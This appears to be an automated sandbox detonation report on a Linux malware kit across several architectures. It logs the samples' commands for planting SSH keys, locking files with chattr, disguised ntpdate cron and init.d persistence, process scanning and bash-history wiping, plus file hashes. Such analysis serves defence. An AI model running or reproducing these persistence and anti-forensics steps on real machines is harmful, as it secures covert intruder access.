/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]

Network

N/A

Files

/root/.ssh/authorized_keys

MD5 3fdca3b51b9c7ea16d39ffe168fdb5f9
SHA1 129679920ccdd3b0f43bb743c475d0e6bfa65488
SHA256 c11d21fa2f98c2c0a1c311042d0d3302f289b47320fdaaaff371b100c2e97b22
SHA512 eee67cda123034a81886571e6aa1dcd7d5eb7eb74af6ed71e336b6cb4fbe151ccc7efdcdbecc50b17dcfd00ef319edc119648fbbfd3643c98afa80c88d425f94

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

2s

Command Line

[/tmp/.systemd/.run]

Signatures

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/16/stat /bin/ps N/A
File opened for reading /proc/18/status /bin/ps N/A
File opened for reading /proc/70/cmdline /bin/ps N/A
File opened for reading /proc/672/status /bin/ps N/A
File opened for reading /proc/13/status /bin/ps N/A
File opened for reading /proc/379/cmdline /bin/ps N/A
File opened for reading /proc/10/stat /bin/ps N/A
File opened for reading /proc/72/stat /bin/ps N/A
File opened for reading /proc/172/status /bin/ps N/A
File opened for reading /proc/10/status /bin/ps N/A
File opened for reading /proc/380/stat /bin/ps N/A
File opened for reading /proc/675/cmdline /bin/ps N/A
File opened for reading /proc/13/stat /bin/ps N/A
File opened for reading /proc/4/stat /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/732/stat /bin/ps N/A
File opened for reading /proc/737/stat /bin/ps N/A
File opened for reading /proc/18/stat /bin/ps N/A
File opened for reading /proc/110/cmdline /bin/ps N/A
File opened for reading /proc/82/cmdline /bin/ps N/A
File opened for reading /proc/157/status /bin/ps N/A
File opened for reading /proc/232/cmdline /bin/ps N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/4/cmdline /bin/ps N/A
File opened for reading /proc/728/cmdline /bin/ps N/A
File opened for reading /proc/385/stat /bin/ps N/A
File opened for reading /proc/726/status /bin/ps N/A
File opened for reading /proc/232/stat /bin/ps N/A
File opened for reading /proc/334/stat /bin/ps N/A
File opened for reading /proc/334/status /bin/ps N/A
File opened for reading /proc/3/stat /bin/ps N/A
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/337/status /bin/ps N/A
File opened for reading /proc/11/cmdline /bin/ps N/A
File opened for reading /proc/10/status /bin/ps N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/20/status /bin/ps N/A
File opened for reading /proc/749/cmdline /bin/ps N/A
File opened for reading /proc/10/cmdline /bin/ps N/A
File opened for reading /proc/686/status /bin/ps N/A
File opened for reading /proc/728/status /bin/ps N/A
File opened for reading /proc/sys/kernel/pid_max /bin/ps N/A
File opened for reading /proc/122/status /bin/ps N/A
File opened for reading /proc/365/stat /bin/ps N/A
File opened for reading /proc/70/stat /bin/ps N/A
File opened for reading /proc/73/cmdline /bin/ps N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/17/stat /bin/ps N/A
File opened for reading /proc/706/cmdline /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
File opened for reading /proc/750/cmdline /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A
File opened for reading /proc/12/stat /bin/ps N/A
File opened for reading /proc/17/cmdline /bin/ps N/A
File opened for reading /proc/725/cmdline /bin/ps N/A
File opened for reading /proc/73/cmdline /bin/ps N/A
File opened for reading /proc/75/stat /bin/ps N/A
File opened for reading /proc/675/cmdline /bin/ps N/A
File opened for reading /proc/232/stat /bin/ps N/A
File opened for reading /proc/247/stat /bin/ps N/A
File opened for reading /proc/736/status /bin/ps N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/36/status /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep -v R]

/bin/ps

[ps x]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/grep

[grep ssh$]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v R]

/bin/grep

[grep sh$]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .mips -bash]

/tmp/.systemd/-bash

[./-bash]

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

1s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.H4b4Eo /usr/bin/crontab N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep .systemd]

/usr/bin/wc

[wc -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.H4b4Eo

MD5 54e3db15261abf8fb2fe18e1bc40ac54
SHA1 1817d7f2f29f77d7a12c631828edbdce337e6a84
SHA256 74a6d7c05f80bf9fd583ad1e7d7422c6acdb640eb7c2dc0147b4d9f7d1950e0b
SHA512 4aecb5695a6db5fdb136f8520e4cbea9a4edb9b9968d69b006641a61ab257df78a85de7ac12ca5606abb6de67892b8416ac36db5a06ff5bce1927b4f0cc953ed

/tmp/.systemd/.systemd

MD5 9ef2b0f44129dbed4b1284c1d748b10b
SHA1 2bb3bcea6f21a5567090bdacd84ca4b1482d9f68
SHA256 5a2aceb88f74b14be6fb451f8d7d0fb29b5eb5c14a1342c51fddbf312e158cf3
SHA512 e0daccbdd2034b50c8444482efda6d66988b19ac5424ae39452a643993fe3383c8be855a49c83cdaa37bbd1563c7dc0883d2bc96807471558a5bc4209a24738c

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsel-20240611-en

Max time kernel

1s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.53uIAl /usr/bin/crontab N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep .systemd]

/usr/bin/wc

[wc -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.53uIAl

MD5 dbb47228523c48edfe60dda1b012f03d
SHA1 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14
SHA256 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e
SHA512 a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287

/tmp/.systemd/.systemd

MD5 9ef2b0f44129dbed4b1284c1d748b10b
SHA1 2bb3bcea6f21a5567090bdacd84ca4b1482d9f68
SHA256 5a2aceb88f74b14be6fb451f8d7d0fb29b5eb5c14a1342c51fddbf312e158cf3
SHA512 e0daccbdd2034b50c8444482efda6d66988b19ac5424ae39452a643993fe3383c8be855a49c83cdaa37bbd1563c7dc0883d2bc96807471558a5bc4209a24738c

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/entpdate /usr/bin/tee N/A
File opened for modification /sbin/lntpdate /usr/bin/tee N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

0s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.mips

[./.mips -f]

Network

N/A

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 a0669fc7ed6e6c80a991b070e1f7909a
SHA1 313f4f3deaf4237a8d0059593f1a68d7b7cc434f
SHA256 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b
SHA512 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240729-en

Max time kernel

2s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]

Network

N/A

Files

/root/.ssh/authorized_keys

MD5 5c32d0c2275c7ce0965aafd240461f13
SHA1 17eb3e899cf234ee1a8ddc07e8979d72a0d92a0c
SHA256 d7517566205c297d1efd7a9e81a57fc53f39e6ce2e42f0044933238d37da36ce
SHA512 3c0aa1096dd8f538616a43b1a32b8b97322608d53ed35f7dea500f799a29b3eccaeecfe0b1358cf118ad3c0f1d74f23ca7650ad8174a5cad1751e1667bd6d13c

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Command Line

[/tmp/.systemd/.run]

Signatures

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/13/stat /bin/ps N/A
File opened for reading /proc/28/cmdline /bin/ps N/A
File opened for reading /proc/29/status /bin/ps N/A
File opened for reading /proc/281/cmdline /bin/ps N/A
File opened for reading /proc/295/cmdline /bin/ps N/A
File opened for reading /proc/661/stat /bin/ps N/A
File opened for reading /proc/683/stat /bin/ps N/A
File opened for reading /proc/28/stat /bin/ps N/A
File opened for reading /proc/606/status /bin/ps N/A
File opened for reading /proc/3/cmdline /bin/ps N/A
File opened for reading /proc/342/status /bin/ps N/A
File opened for reading /proc/598/cmdline /bin/ps N/A
File opened for reading /proc/683/cmdline /bin/ps N/A
File opened for reading /proc/14/cmdline /bin/ps N/A
File opened for reading /proc/144/cmdline /bin/ps N/A
File opened for reading /proc/679/cmdline /bin/ps N/A
File opened for reading /proc/26/status /bin/ps N/A
File opened for reading /proc/29/cmdline /bin/ps N/A
File opened for reading /proc/22/status /bin/ps N/A
File opened for reading /proc/314/stat /bin/ps N/A
File opened for reading /proc/328/stat /bin/ps N/A
File opened for reading /proc/606/status /bin/ps N/A
File opened for reading /proc/691/stat /bin/ps N/A
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/155/stat /bin/ps N/A
File opened for reading /proc/279/stat /bin/ps N/A
File opened for reading /proc/283/stat /bin/ps N/A
File opened for reading /proc/694/status /bin/ps N/A
File opened for reading /proc/686/cmdline /bin/ps N/A
File opened for reading /proc/686/cmdline /bin/ps N/A
File opened for reading /proc/706/cmdline /bin/ps N/A
File opened for reading /proc/41/stat /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /bin/ps N/A
File opened for reading /proc/283/stat /bin/ps N/A
File opened for reading /proc/81/status /bin/ps N/A
File opened for reading /proc/342/cmdline /bin/ps N/A
File opened for reading /proc/685/cmdline /bin/ps N/A
File opened for reading /proc/self/stat /bin/ps N/A
File opened for reading /proc/316/cmdline /bin/ps N/A
File opened for reading /proc/1/status /bin/ps N/A
File opened for reading /proc/281/status /bin/ps N/A
File opened for reading /proc/155/cmdline /bin/ps N/A
File opened for reading /proc/601/status /bin/ps N/A
File opened for reading /proc/113/stat /bin/ps N/A
File opened for reading /proc/693/cmdline /bin/ps N/A
File opened for reading /proc/43/cmdline /bin/ps N/A
File opened for reading /proc/279/status /bin/ps N/A
File opened for reading /proc/8/stat /bin/ps N/A
File opened for reading /proc/143/stat /bin/ps N/A
File opened for reading /proc/103/stat /bin/ps N/A
File opened for reading /proc/598/cmdline /bin/ps N/A
File opened for reading /proc/229/cmdline /bin/ps N/A
File opened for reading /proc/280/stat /bin/ps N/A
File opened for reading /proc/598/status /bin/ps N/A
File opened for reading /proc/686/cmdline /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/29/stat /bin/ps N/A
File opened for reading /proc/603/cmdline /bin/ps N/A
File opened for reading /proc/655/cmdline /bin/ps N/A
File opened for reading /proc/679/status /bin/ps N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/24/stat /bin/ps N/A
File opened for reading /proc/26/cmdline /bin/ps N/A
File opened for reading /proc/21/stat /bin/ps N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep -v R]

/bin/ps

[ps x]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/grep

[grep ssh$]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep sh$]

/bin/ps

[ps x]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .armv7l -bash]

/tmp/.systemd/-bash

[./-bash]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf .i686]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
GB 89.187.167.38:443 tcp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240418-en

Max time kernel

0s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
